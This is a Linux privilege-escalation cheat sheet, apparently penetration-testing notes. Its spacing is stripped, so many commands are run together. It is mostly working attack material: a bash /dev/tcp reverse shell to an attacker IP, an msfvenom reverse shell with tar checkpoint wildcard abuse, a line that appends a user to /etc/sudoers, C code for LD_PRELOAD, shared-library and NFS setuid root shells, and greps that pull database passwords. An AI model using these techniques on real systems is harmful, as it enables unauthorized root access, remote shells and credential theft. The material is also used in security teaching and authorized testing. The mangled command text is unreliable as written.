# checking the Kernel level and Linux OS version.uname-acat/etc/lsb-release
Cron Jobs
# Find world writables files or directories, look for uncommon files which can be leveraged to escalate privelgesfind/-path/proc-prune-o-typef-perm-o+w2>/dev/null# Find cron jobscat/etc/crontab# Confirm the job is running using pspy - <https://github.com/DominicBreuker/pspy># The -pf flag tells the tool to print commands and file system events and -i 1000 tells it to scan profcs every 1000ms (or every second).
./pspy64-pf-i1000# If a script is running by a root by a cron job and also writable by us then we can add ou reverse shell one liner to the script
bash-i>&/dev/tcp/ip/4430>&1
If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.
# Create a file with esame name as cron job in a directory writable by user which is also included in PATH---#!/bin/bashcp/bin/bash/tmp/rootbashchmod+s/tmp/rootbash---# make it executable and wait for cron jobto run and then try to execute the script/tmp/rootbash–p
Special Permissions
Setuid Bit -
The Set User ID upon Execution(setuid) permission can allow a user to execute a program or script with the permissions of another user, typically with elevated privileges. The setuidbit appears as an s.
Setgid Bit -
The Set-Group-ID (setgid) permission is another special permission that allows us to run binaries as if we were part of the group that created them.
# find files with setuid bit set find/-userroot-perm-4000-execls-ldb{} \\; 2>/dev/null# find files with setgid bit setfind/-userroot-perm-6000-execls-ldb{} \\; 2>/dev/null# We can use GTFOBins to bypass security restrictions.
Sudo Rights Abuse
# Checking sudo rights of usersudo-l# Check GTFObins for any useful abuse
PATH abuse
# Checking PATH contentecho $PATHenv|grepPATH# Adding to PATH variablePATH=.:${PATH}export PATHecho $PATH# If we want to run a file in our current directory without specifying path.touchlsecho'echo "PATH ABUSE!!"'>lschmod+xls
Wildcard Abuse
# To add user to sudoers fileecho"eren ALL=(root) NOPASSWD: ALL">>/etc/sudoers# Check if a command is run by any cron job or any script with wildacrd # create a reverse shell using msfvenom msfvenom-plinux/x64/shell_reverse_tcpLHOST=<IP>LPORT=53-felf-oshell.elf# Paste the reverse shell where the command is running from# Create two files in the directory:touchdirectory--checkpoint=1touchdirectory--checkpoint-action=exec=shell.elf# wait for job to run and get a root shell
Credential Hunting
# Finding Files which may contain credentialsfind/!-path"*/proc/*"-iname"*config*"-typef2>/dev/nullcatwp-config.php|grep'DB_USER\\|DB_PASSWORD'# Also look for SSH Keys
Environment Variable
LD_PRELOAD
# List the programs your user is allowed to run via *sudo*# Note if the env_keep option includes the LD_PRELOAD environment variable.# Create c program to get a root shell---#include <stdio.h>#include <sys/types.h>#include <stdlib.h>void_init() {unsetenv("LD_PRELOAD");setresuid(0,0,0);system("/bin/bash -p");}---gcc-fPIC-shared-nostartfiles-o/tmp/preload.sopreload.c# Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:
LD_LIBERARY_PATH
# print the shared object required by a binary or shared objectlddbinary# Checking RUNPATH configurationreadelf-dbinary|grepPATH# Compile a shared object with below code to pop a root shell---#include<stdio.h>#include<stdlib.h>voiddbquery() {printf("Malicious library loaded\\n");setuid(0);system("/bin/sh -p");}---gccsrc.c-fPIC-shared-o/development/libshared.so<--pathwherebinaryislocated
Weak NFS Privileges
# List the mountable sharesshowmount-eip# create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit.
shell.c---#include <stdio.h>#include <sys/types.h>#include <unistd.h>intmain(void){setuid(0); setgid(0); system("/bin/bash");}---# compile the binarygccshell.c-oshell# Mount the sharesudomount-tnfsip:/tmp/mntcpshell/mntchmodu+s/mnt/shell# Run the binary in low prvileged user shell./shell